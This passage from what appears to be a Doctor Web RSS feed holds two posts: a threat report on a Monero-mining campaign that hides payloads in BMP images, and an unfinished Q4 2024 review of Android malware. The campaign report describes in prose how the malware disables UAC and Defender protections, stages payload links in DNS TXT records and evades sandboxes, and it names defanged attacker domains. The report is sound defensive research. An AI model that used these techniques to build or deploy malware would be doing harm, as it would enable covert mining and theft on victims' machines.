&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;When analyzing telemetry data, virus analysts at Doctor Web identified malware samples that, upon closer examination, turned out to be components of an active campaign to mine the Monero cryptocurrency. This campaign is notable because it is implemented as a series of malware chains, two of which are based on executing scripts that extract malicious payloads from BMP image files.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The campaign likely began in 2022 when our analysts first observed &lt;span class="string"&gt;Services.exe&lt;/span&gt;, a .NET application that launched a malicious VBScript. This script implements backdoor functionality by contacting the attacker's server and executing the scripts and files sent in response. For example, the malicious file &lt;span class="string"&gt;ubr.txt&lt;/span&gt;, a PowerShell script whose extension was changed from ps1 to txt, was downloaded to the victim's computer.&lt;/p&gt;
&lt;p&gt;The &lt;span class="string"&gt;ubr.txt&lt;/span&gt; script checks for miners that may already be installed on the compromised machine and replaces them with the versions the attackers provide. The files installed by the script are the SilentCryptoMiner miner and its configuration, which the hackers used to mine the Monero cryptocurrency.&lt;/p&gt;


&lt;p&gt;We have &lt;a target="_blank" rel="noopener noreferrer" href="https://news.drweb.com/show/?i=14920"&gt;reported&lt;/a&gt; on the use of &lt;a target="_blank" rel="noopener noreferrer" href="https://news.drweb.com/show/?i=14792&amp;lng=ru&amp;c=23"&gt;this miner&lt;/a&gt; by attackers who are attracted by its ease of configuration, its advanced capabilities for mining different types of cryptocurrencies and hiding from diagnostic utilities, and its ability to remotely manage all of the miners in the botnet via a web panel.&lt;/p&gt;

&lt;p&gt;As part of this campaign, the miner files are disguised as components of various software, such as the Zoom video conferencing application (&lt;span class="string"&gt;ZoomE.exe&lt;/span&gt; and &lt;span class="string"&gt;ZoomX.exe&lt;/span&gt;), Windows services (&lt;span class="string"&gt;Service32.exe&lt;/span&gt; and &lt;span class="string"&gt;Service64.exe&lt;/span&gt;), etc. Although there exist several sets of malicious modules with different names, they all perform the same tasks: removing other miners, installing a new miner, and delivering updates for it.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/1_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;PowerShell script &lt;span class="string"&gt;ubr.txt&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In addition, the miner accesses the getcert[.]net domain, which hosts the &lt;span class="string"&gt;m.txt&lt;/span&gt; file containing the cryptocurrency mining settings. This domain is also used in other infection chains.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/2_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The miner configuration included in the &lt;span class="string"&gt;m.txt&lt;/span&gt; file&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Later, fraudsters modified the attack methodology, making it much more interesting and incorporating steganography tools.&lt;/p&gt;

&lt;blockquote&gt;
    Steganography is a method of hiding information within other information. Unlike cryptography, which can draw attention to encrypted data, steganography allows information to be hidden inconspicuously, such as in an image. Many cybersecurity experts believe that the use of steganography to bypass defenses will grow in popularity.
&lt;/blockquote&gt;

&lt;div class="fx -part_2 fxItemsCenter"&gt;
    &lt;div class="paddXS paddYS noMarg cell"&gt;
        &lt;p class="alignCenter"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/3_1.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/3.png" alt="#drweb"&gt;&lt;/a&gt;
        &lt;/p&gt;
    &lt;/div&gt;
    &lt;div class="paddXS paddYS noMarg cell"&gt;
        &lt;p class="alignCenter"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/4_1.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/4.png" alt="#drweb"&gt;&lt;/a&gt;
        &lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;

&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The image on the left (credit: &lt;a target="_blank" rel="noopener noreferrer" href="https://unsplash.com/@marekpiwnicki"&gt;Marek Piwnicki&lt;/a&gt;) contains a hidden image with the Dr.Web logo&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The second, more recent chain employs the Amadey trojan, which runs the PowerShell script &lt;span class="string"&gt;Async.ps1&lt;/span&gt;. The script downloads BMP images from the legitimate image-hosting site imghippo.com. A steganographic algorithm extracts two executables from the images: the &lt;a href="https://vms.drweb.com/search/?q=Trojan.PackedNET.2429&amp;lng=en"&gt;&lt;b&gt;Trojan.PackedNET.2429&lt;/b&gt;&lt;/a&gt; stealer and a payload that does the following:&lt;/p&gt;

&lt;ul&gt;
    &lt;li&gt;
        Disables the UAC prompt for administrators
    &lt;/li&gt;
    &lt;li&gt;
        Makes numerous exceptions to the built-in Windows Defender antivirus
    &lt;/li&gt;
    &lt;li&gt;Disables notifications in Windows&lt;/li&gt;
    &lt;li&gt;Creates a new task in &lt;span class="string"&gt;\Microsoft\Windows\WindowsBackup\&lt;/span&gt; with the name 'User'.&lt;/li&gt;
&lt;/ul&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/5.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/5_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Contents of the &lt;span class="string"&gt;Async1.ps&lt;/span&gt; script&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;During its execution, the task accesses the attackers' domains, whose DNS TXT record contains the address of the payload. Once the payload has been downloaded, the archive containing BMP images is unpacked and the following files are launched:&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;span class="string"&gt;Cleaner.txt&lt;/span&gt;, a PowerShell script that removes all other miners,&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;span class="string"&gt;m.txt&lt;/span&gt;, a PowerShell script that extracts payloads from &lt;span class="string"&gt;m.Bmp&lt;/span&gt; and &lt;span class="string"&gt;IV.Bmp&lt;/span&gt; images. The payload inside the images is SilentCryptoMiner and the injector that runs it,&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;span class="string"&gt;Net.txt&lt;/span&gt;, a script that reads a DNS TXT record from the domains windowscdn[.]site and buyclients[.]xyz. This record contains a payload link pointing to raw.githack[.]com.&lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
    A DNS TXT record is a standard DNS record type that holds free-form text and is commonly used to verify domain ownership. However, the domain owner can include any data in it, such as, in this case, a payload link.
&lt;/blockquote&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/6.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/6_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Contents of the archive with malicious images&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The miner modules are constantly evolving. Recently, the authors switched to using legitimate resources to host malicious images and the GitHub platform to store payloads. Additionally, we have observed modules that verify whether this malware is running in sandboxes and virtual machines.&lt;/p&gt;
&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/7.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/7_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;A module that checks the names of running applications against the names of common tools used by cybersecurity researchers&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;One of the wallets found in the miner's configuration was created in May 2022, and so far, it has received 340 XMR. However, the exchange rate of this cryptocurrency is experiencing a period of significant volatility, so in this case the fraudsters' profit could be 65–70 thousand USD. Judging by the wave-like shape of the hash rate curve, which indicates that the computers in the botnet are turned on and off regularly, this mining campaign mostly involves ordinary users located in the same group of time zones. On average, the hash rate is 3.3 million hashes per second, which allows compromised machines to earn the attackers 1 XMR every 40 hours or so.&lt;/p&gt;
&lt;p&gt;This campaign is just the tip of the iceberg in the world of steganography-based cyber threats and underscores the importance of being vigilant in the digital space. Doctor Web's recommendations remain unchanged: only install software from reliable sources, do not click on suspicious links, and do not disable antivirus protection when downloading files from the Internet.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/getcert_en.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/getcert_en_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Attack chain&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a target="_blank" rel="noopener noreferrer" href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/get_cert%20campaign"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a target="_blank" rel="noopener noreferrer" href="https://vms.drweb.com/virus/?i=25898223"&gt;&lt;b&gt;SilentCryptoMiner&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=PowerShell.Starter.98&amp;lng=en"&gt;&lt;b&gt;PowerShell.Starter.98&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=PowerShell.DownLoader.1640&amp;lng=en"&gt;&lt;b&gt;PowerShell.DownLoader.1640&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Trojan.PackedNET.2429&amp;lng=en"&gt;&lt;b&gt;Trojan.PackedNET.2429&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=VBS.DownLoader.2822&amp;lng=en"&gt;&lt;b&gt;VBS.DownLoader.2822&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14950&amp;lng=en</guid><title>Doctor Web’s Q4 2024 review of virus activity on mobile devices</title><link>https://news.drweb.com/show/?i=14950&amp;lng=en&amp;c=9</link><pubDate>Thu, 26 Dec 2024 10:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;December 26, 2024&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans were the malware programs most frequently detected in the fourth quarter of 2024 (Q4). The second most common threats were &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans, which are used in fraudulent schemes. Trojans from the &lt;b&gt;Android.Siggen&lt;/b&gt; family, capable of executing various malicious tasks, ranked third.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;Over the course of Q4, Doctor Web’s malware analysts discovered many threats on Google Play. Among them were numerous &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans and malware from the &lt;a href="https://vms.drweb.com/search/?q=Android.Subscription&amp;lng=en"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; families, which subscribe users to paid services. More &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans were also detected. In addition, threat actors distributed malicious apps protected with a sophisticated software packer.&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;PRINCIPAL TRENDS OF Q4 2024&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;High activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans and &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fraudulent apps&lt;/li&gt;
      &lt;li&gt;The distribution of many malicious programs through the Google Play catalog&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;

  &lt;h2 class="alignCenter"&gt;According to statistics collected by Dr.Web Security Space for mobile devices&lt;/h2&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/01_malware_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/01_malware_q4_2024_en.1.png" alt="According to statistics collected by Dr.Web Security Space for mobile devices"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A trojan app that loads a website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Trojan apps designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57083&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for malicious applications protected with an ApkProtector software packer. Among them are banking trojans, spyware, and other malicious software.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Click.1751&amp;lng=en"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;This trojan is built into third-party WhatsApp messenger mods and camouflaged as Google library classes. While the host application is being used, &lt;a href="https://vms.drweb.com/search/?q=Android.Click.1751&amp;lng=en"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt; connects to one of the C&amp;C servers and receives two URLs from it. One of them is intended for Russian-speaking users, and the other is for everyone else. The trojan then displays a dialog box whose contents it has also received from a remote server. When a user clicks on the confirmation button, malware loads the corresponding link in the browser.&lt;/dd&gt;    
  &lt;/dl&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/02_unwanted_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/02_unwanted_q4_2024_en.1.png" alt="According to statistics collected by Dr.Web Security Space for mobile devices"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, users can remotely manage these apps. They can block them, display custom dialogs, and track when other software is being installed or removed from a device, etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, use the camera to record video and take photos, eavesdrop via the microphone, record audio, etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for various modifications of an application that is designed to record videos and take photos in the background, using built-in Android device cameras. It can operate covertly by allowing notifications about ongoing recordings to be disabled. It also allows an app’s icon and name to be replaced with fake ones. This functionality makes this software potentially dangerous.&lt;/dd&gt;
  &lt;/dl&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/03_riskware_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/03_riskware_q4_2024_en.1.png" alt="According to statistics collected by Dr.Web Security Space for mobile devices"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A riskware platform that allows applications to launch APK files without installing them. It creates a virtual runtime environment in the context of the apps in which they are integrated. The APK files launched with the help of this platform can operate as if they are part of such programs and can also obtain the same permissions.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change the logic of their work or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads specially prepared scripts from the Internet, which can be crafted and added to the common database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A packer tool designed to protect Android applications from unauthorized modifications and reverse engineering. This tool is not malicious in itself, but it can be used to protect both harmless and malicious software.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for some potentially dangerous versions of a specialized framework for developing Android software based on the Lua scripting language. The main logic of Lua-based apps resides in the corresponding scripts that are encrypted and decrypted by the interpreter upon execution. By default, this framework often requests access to a large number of system permissions in order to operate. As a result, the Lua scripts that it executes can potentially perform various malicious actions in accordance with the acquired permissions. &lt;/dd&gt;
  &lt;/dl&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/04_adware_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/04_adware_q4_2024_en.1.png" alt="According to statistics collected by Dr.Web Security Space for mobile devices"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for some modified versions (mods) of the WhatsApp messenger into which specific code has been injected. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) while the messenger is in use. Such web addresses redirect to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;These are apps that display unwanted ads which often lead to malicious and fraudulent websites. They share a common code base with the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney.11&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney.11&lt;/b&gt;&lt;/a&gt; unwanted applications.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;An adware module that malicious actors embed into the cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;
  &lt;/dl&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="formobile"&gt;
  &lt;h2 class="alignCenter"&gt;Threats on Google Play&lt;/h2&gt;
  &lt;p&gt;In Q4 2024, Doctor Web’s malware analysts discovered over 60 malicious apps on Google Play, most of which were trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; family. Some of them were distributed as financial programs, teaching aids, reference books, and other software, including diaries, notepads, and so on. Their primary task was to load fraudulent websites.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/05_Android.FakeApp.1708_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/05_Android.FakeApp.1708_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/06_Android.FakeApp.1729_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/06_Android.FakeApp.1729_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The “QuntFinanzas” and “Trading News” apps, which, among other numerous Android.FakeApp trojans, loaded fraudulent sites&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Malicious actors disguised other &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans as games. These could load online casino and bookmaker websites.&lt;/p&gt;
  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/07_Android.FakeApp.1719_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/07_Android.FakeApp.1719_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/08_Android.FakeApp.1733_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/08_Android.FakeApp.1733_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;“Bowl Water” and “Playful Petal Pursuit” are examples of games with trojan functionality&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Our experts also &lt;a href="https://news.drweb.com/show/?i=14935&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;uncovered&lt;/a&gt; new variants of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; trojan, which was disguised as various programs and could also load online casino websites. &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; is interesting in that it gets the target website URL from a TXT record served by the malicious DNS server. At the same time, it only manifests itself when the device is connected to the Internet through certain providers.&lt;/p&gt;
  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/09_Android.FakeApp.1669_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/09_Android.FakeApp.1669_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/10_Android.FakeApp.1669_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/10_Android.FakeApp.1669_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
